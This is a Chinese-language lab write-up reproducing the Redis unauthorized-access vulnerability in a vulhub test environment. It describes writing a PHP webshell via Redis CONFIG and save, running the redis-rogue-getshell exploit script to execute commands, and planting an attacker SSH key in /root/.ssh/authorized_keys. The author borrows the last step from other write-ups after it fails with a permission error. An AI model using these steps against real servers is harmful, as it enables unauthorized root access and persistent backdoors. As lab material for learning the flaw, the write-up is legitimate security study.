0x01 Redis 4-unacc漏洞详情

漏洞概述：利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。

影响版本：Redis 2.x，3.x，4.x，5.x

产生条件：

①没有进行添加防火墙规则和采用避免其他非信任来源ip访问等相关安全的策略

②可以免密码登录redis服务或者弱密码登录redis.

靶机ip和攻击机ip：192.168.210.148/192.168.210.130

---

0x01 复现过程

1.使用docker-compose up -d拉取redis复现环境并启动

2.利用攻击机安装redis-cli远程连接工具

下载后依次执行以下命令：

tar -zxvf redis-stable.tar.gz
cd redis-stable
make

cp src/redis-cli /usr/bin/
redis-cli -h

3.用redis-cli命令远程免密登录redis主机

redis-cli远程登录格式为：

无密码登录命令
redis-cli -h 目标主机IP
# 有密码登录命令
redis-cli -h 目标主机IP -p 端口6379 -a 登录密码

测试连通性 和查看redis的基本信息

4.写入shell文件

因为靶场没有开启web端口无法直接上传木马文件，所以用写入shell文件的方式添加后门

将dir设置为一个目录A，而dbfilename为文件名B，再执行save或bgsave，则我们就可以

写入一个路径为/A/B的任意文件

在tmp目录下写入一个test.php的木马文件

写入文件内容时添加几个换行，是因为redis写入文件时会自带一些版本信息，若不换行可能会导致木马无法正常执行

进入靶机查看，写入shell文件成功

5.使用py脚本执行远程命令

首先把exp进行下载，并进入该目录执行make命令

回到redis-rogue-getshell目录下

执行

./redis-master.py -r 192.168.239.128 -p 6379 -L 192.168.239.128 -P 8989 -f RedisModulesSDK/exp/exp.so -c “whoami”(第一个ip是靶机，第二个ip是攻击机)

6.ssh公私钥免密登录

原理：
登陆linux有几种方式，最常用的是密码登陆和RSA key 登陆，RSA key登陆
是生成一个公私对应的秘钥，然后将公钥放到linux系统的/root/.ssh/authorized_keys
的文件中，我们本地客户端通过导入对应私钥进行登陆，这就是RSA key的登陆方式。
但是为什么redis可以获取服务器的root权限呢？
上面RSA key的登陆方式在服务器方面是要将公钥写入authorized_keys文件中的，
而redis有一种持久化方式是生成RDB文件，通过持久化将公钥写入root下的authored_keys文件里，
这样就将非法的公钥写到了验证文件里，后面我们拿对应私钥登陆即可。
（但是这种方式需要再redis是root启动的情况下使用，因为非root权限无法进入/root目录）

回车回车回车

进入/root/.ssh目录: 将生成的公钥保存到1.txt：

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

更改目标服务器Redis备份路径为ssh公钥存放目录（一般默认为/root/.ssh）：

报错了，说没有root权限

(error) ERR Changing directory: Permission denied

可能是vulhub靶场搭建的问题

到这里只能借鉴其他的师傅的文章了

设置上传公钥的备份文件名字为authorized_keys：

保存并退出

可以发现，此时在攻击机上使用SSH免密登录靶机，利用私钥成功登入redis服务器

0x03 总结

总的来说，redis未授权访问还是值得复现的，是一个简单高效能获取目标服务器权限的方法。